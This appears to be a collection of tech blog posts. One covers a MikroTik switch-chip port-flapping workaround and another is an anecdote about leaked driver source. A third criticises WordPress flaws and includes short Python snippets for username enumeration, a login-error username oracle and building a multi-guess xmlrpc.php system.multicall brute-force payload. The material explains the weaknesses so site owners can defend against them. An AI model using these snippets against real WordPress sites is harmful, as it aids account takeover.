MikroTik local link up / down on high traffic

One of our RouterBOARD routers, a MikroTik RB750 (mipsbe, with an Atheros AR7240 switch chip) running v6.35.2 (the latest version at the time), has been crashing constantly under high network load. One particularly interesting detail: it crashed on traffic that went through the internal switch chip, but not on other traffic.

The log file shows the following pattern:
may/13 21:23:17 interface,info ether1-gateway link up (speed 100M, full duplex)
may/13 21:23:17 interface,info ether2-master-local link up (speed 100M, full duplex)
may/13 21:23:17 interface,info ether4-slave-local link up (speed 100M, full duplex)
may/13 21:24:21 system,info sntp change time May/13/2016 21:23:38 => May/13/2016 21:24:21
may/13 21:26:22 interface,info ether2-master-local link down
may/13 21:26:22 interface,info ether4-slave-local link down
may/13 21:26:24 interface,info ether2-master-local link up (speed 100M, full duplex)
may/13 21:26:24 interface,info ether4-slave-local link up (speed 100M, full duplex)
may/13 21:29:16 interface,info ether2-master-local link up
may/13 21:29:16 interface,info ether4-slave-local link down
may/13 21:29:17 interface,info ether2-master-local link down
may/13 21:29:18 interface,info ether2-master-local link up (speed 100M, full duplex)
may/13 21:29:18 interface,info ether4-slave-local link up (speed 100M, full duplex)
may/13 21:36:01 interface,info ether4-slave-local link down

A little searching on the internet shows that we are not alone: port flapping is widespread in the MikroTik world, with many reports of similar problems dating back to 2011, but no solution.

My guess is that the switch chip is broken, dead, malfunctioning, or buggy. Or perhaps the switch “part” of the MikroTik router is sensitive to voltage or current fluctuations.

Anyway, we solved this by disabling the switch and moving each port to a different subnet (bridging may also work). Now all traffic is sent through the CPU, and even though MikroTik advertises the switch as wire-speed, we noticed that traffic through the CPU actually performs better.
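For reference, on RouterOS v6 (before the hardware-offload rework in 6.41) per-port switching is controlled by the `master-port` property. A rough sketch of the change, using the interface names from the log above; the addresses are illustrative examples, not our actual configuration:

```
# Sketch only: detach the slave port from the switch group, so frames
# are no longer forwarded in the switch chip but routed by the CPU.
/interface ethernet set ether4-slave-local master-port=none

# Then give each now-independent port its own subnet (example addresses).
/ip address add address=192.168.2.1/24 interface=ether2-master-local
/ip address add address=192.168.4.1/24 interface=ether4-slave-local
```

With `master-port=none` on every former slave, the switch chip is effectively bypassed and each port behaves as a separate routed interface.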

WordPress still insecure by design

Some major WordPress design flaws have led to widespread attacks on our servers, and probably on yours too. The only defenses are reasonably long, strong passwords or WordPress security plugins.

The first flaw. By default, WordPress has a “feature” enabled: when you visit a blog with an author query string appended, it nicely reveals usernames. For example, if you have:

http://example.com/

just add ?author=1:

http://example.com/?author=1

and a default WordPress installation redirects you to:

http://example.com/author/username/

If you need the next valid username, change 1 to 2:

http://example.com/?author=2
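This enumeration is trivial to script. As an illustrative sketch (the helper name and URLs are ours, not from WordPress), the username is just the last path segment of the redirect target:

```python
from urllib.parse import urlparse

def username_from_redirect(location: str):
    """Extract the username from a WordPress author-archive redirect.

    A request to /?author=N redirects to /author/<username>/ on a
    default install; we simply take that trailing path segment.
    """
    parts = [p for p in urlparse(location).path.split("/") if p]
    if len(parts) >= 2 and parts[-2] == "author":
        return parts[-1]
    return None

# e.g. the Location header returned for /?author=1
print(username_from_redirect("http://example.com/author/admin/"))  # admin
```

An attacker just loops over author IDs, follows each redirect, and collects every valid login name on the site.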
The second flaw. WordPress has two distinct login error messages:

ERROR: Invalid username


ERROR: The password you entered for the username admin is incorrect.

So basically, you can check whether a particular username is valid.
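That difference is a classic username oracle. A hypothetical sketch of how an attacker's script would read it, using the two messages quoted above:

```python
def username_exists(error_message: str) -> bool:
    """Classify a WordPress login error: 'Invalid username' means the
    account does not exist; a wrong-password error confirms it does."""
    return "Invalid username" not in error_message

print(username_exists("ERROR: Invalid username"))  # False
print(username_exists("ERROR: The password you entered for the "
                      "username admin is incorrect."))  # True
```

A uniform "invalid username or password" message would close this oracle, but that is not what WordPress ships by default.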

The third flaw. Many users use .htaccess to secure the wp-admin directory, but the WordPress developers decided to put a publicly accessible script in the admin folder, so locking down that folder breaks your site in many ways. Of course, you can write more advanced .htaccess rules, but that is no excuse for shipping a public script in the admin folder.

Both front-end and back-end Ajax requests use admin-ajax.php
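As a workaround sketch (not from the original post, and the allowed IP is a placeholder), an .htaccess in wp-admin can deny everything except that one public script, using Apache 2.4 syntax:

```apache
# wp-admin/.htaccess -- example only; 203.0.113.10 is a placeholder IP
<FilesMatch ".*">
    Require ip 203.0.113.10
</FilesMatch>

# Re-open the one script WordPress exposes to the public
<Files "admin-ajax.php">
    Require all granted
</Files>
```

This keeps front-end Ajax working while restricting the rest of the admin area, though it is exactly the kind of extra rule-writing that should not be necessary in the first place.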

The fourth flaw. xmlrpc.php lets attackers try hundreds of username/password combinations in a single web request (system.multicall), via a publicly accessible script that is not hidden behind the wp-admin folder. Just brilliant! By the way, this flaw is still not fixed, and even if your site is not particularly popular, your log files will be full of password-guessing requests from different IP addresses: - - [13/Oct/2015:17:26:55 -0400] "POST /xmlrpc.php HTTP/1.0" 200 561 "-" "-"

Note that the IP address is redacted in the example above.

Read more about this system.multicall thing here: Brute Force Amplification Attacks Against WordPress XMLRPC
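To make the amplification concrete, here is a sketch of the kind of payload system.multicall accepts, built with Python's standard xmlrpc machinery (the credential guesses are obviously made up):

```python
import xmlrpc.client

# Pack several wp.getUsersBlogs login attempts into one XML-RPC request:
# a single HTTP POST to /xmlrpc.php then tests every guess at once.
guesses = [("admin", "123456"), ("admin", "password"), ("admin", "letmein")]

calls = [
    {"methodName": "wp.getUsersBlogs", "params": [user, pw]}
    for user, pw in guesses
]
payload = xmlrpc.client.dumps((calls,), methodname="system.multicall")

print(payload.count("wp.getUsersBlogs"))  # one entry per guess: 3
```

Real attacks stuff hundreds of guesses into one such request, which is why a handful of POSTs to xmlrpc.php in your logs can represent thousands of password attempts.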

The fifth flaw (and not the last). If you know of other flaws or vulnerabilities, please share them in the comments. Only publicly known ones, of course. If you have discovered a new flaw, use proper disclosure channels.

If your source code is a trade secret, then make sure that employees and management know that too…

When management tries to save money and there are no formal policies and procedures, don’t be surprised when data leaks occur… Ungrounded Lightning shares the following story on Slashdot.

Reminds me of story about a graphics chip company

I’ll leave the company name out (mostly to protect my source B-) )

This was in the early part of the cycle of:
– A handful of companies made graphics accelerator chips..
– A BUNCH of new companies also made graphics accelerator chips.
– There was a shakeout and only a few survived – not necessarily many – or any – of the original handful.
The company in question was one of the original few.

The hardware was good. But much of the performance advantages were due to some good algorithms in the driver, which were applicable to other good, bad, or moderate capability hardware, rather than depending on special features of the company’s product.

As with many Silicon Valley companies, where the value added was so high that the administration could be utterly wacky or clueless and the company would still survive for years, this one had some managers make some dumb decisions.

One dumb decision was to try to save money by limiting the personnel to one new floppy disk per month. So the developers kept reusing the disks they had, when they shouldn’t.

As a result, the golden master for an object-only release of the driver was built on a used disk, which had once held the complete sources of the driver in question. Apparently the “reformat” process used didn’t overwrite the sectors – but the manufacturing process that cloned the golden master DID copy those sectors.

A customer tried an undelete utility and found almost the entire source code. Oops!

This news got out. Over the next couple years the great algorithms went from being a valuable trade secret (much of the company’s “secret sauce”) to a de facto industry standard.

Source: Slashdot